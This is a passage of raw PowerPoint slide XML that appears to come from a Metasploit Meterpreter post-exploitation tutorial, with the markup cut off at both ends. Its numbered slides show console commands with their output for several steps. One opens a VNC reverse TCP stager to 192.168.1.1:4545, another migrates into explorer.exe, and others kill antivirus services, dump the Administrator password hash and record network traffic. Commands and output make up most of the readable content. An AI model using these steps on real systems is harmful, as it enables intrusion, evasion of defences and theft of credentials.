          <a:xfrm>
            <a:off x="797142" y="520979"/>
            <a:ext cx="1265090" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6. run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1C57C24-AD6B-6991-3D7F-1F85ADABAF4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386799" y="1090816"/>
            <a:ext cx="9206366" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vnc</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Creating a VNC reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> stager: LHOST=192.168.1.1 LPORT=4545)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Running payload handler</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] VNC stager executable 37888 bytes long</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\CTDWtQC.exe (must be deleted manually)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Executing the VNC agent with endpoint 192.168.1.1:4545...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] VNC Server session 1 opened (192.168.1.1:4545 -&gt; 192.168.1.1:1091)</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A246210B-3C5C-FCBF-2333-F9A1431CA660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825355" y="2898443"/>
            <a:ext cx="2480166" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>7. Migrating a Process</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE6BB617-7523-F236-61A3-09E8F164188D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1490070" y="3450558"/>
            <a:ext cx="9698648" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; run post/windows/manage/migrate</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Running module against V-MAC-XP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Current server process: revterp.exe (2436)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Migrating to explorer.exe...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Migrating into process ID 816</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] New server process: Explorer.EXE</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE7AC806-6ED2-4406-EDF5-88AC12A9F8EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825355" y="4947314"/>
            <a:ext cx="3147080" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>8. Killing Antivirus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Softwares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE5BFAC8-0528-3A3C-6D6A-AF1ED05D3F7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386799" y="5268828"/>
            <a:ext cx="9461812" cy="1554615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7896A7C-BD27-A0EA-6CE1-F7805F3215CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1606379" y="5469880"/>
            <a:ext cx="6664004" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>killav</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Killing Antivirus services on the target...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Killing off antidown.exe...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Killing off antidown.exe...</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419918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1429687" y="3338797"/>
            <a:ext cx="9461812" cy="1008584"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3073CE9-D070-BCD2-7F89-F6269D792881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367152" y="1053304"/>
            <a:ext cx="9461812" cy="1774117"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0A966C0-F1F0-C962-DA9A-7036684722F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797142" y="520979"/>
            <a:ext cx="3191899" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>System Password Hashes</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1C57C24-AD6B-6991-3D7F-1F85ADABAF4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386799" y="1090816"/>
            <a:ext cx="9421169" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hashdump</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Obtaining the boot key...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Calculating the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> key using SYSKEY de4b35306c5f595438a2f78f768772d2...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Obtaining the user list and keys...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Decrypting user keys...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Dumping password hashes...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A246210B-3C5C-FCBF-2333-F9A1431CA660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825355" y="2898443"/>
            <a:ext cx="3769109" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10. Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Traffic on a Target Machine</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE6BB617-7523-F236-61A3-09E8F164188D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1490070" y="3450558"/>
            <a:ext cx="9698648" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>packetrecorder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Starting Packet capture on interface 1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Packet capture started</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE7AC806-6ED2-4406-EDF5-88AC12A9F8EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825355" y="4379686"/>
            <a:ext cx="3268908" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Killing Antivirus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Softwares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE5BFAC8-0528-3A3C-6D6A-AF1ED05D3F7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346156" y="4910168"/>
            <a:ext cx="9461812" cy="1554615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
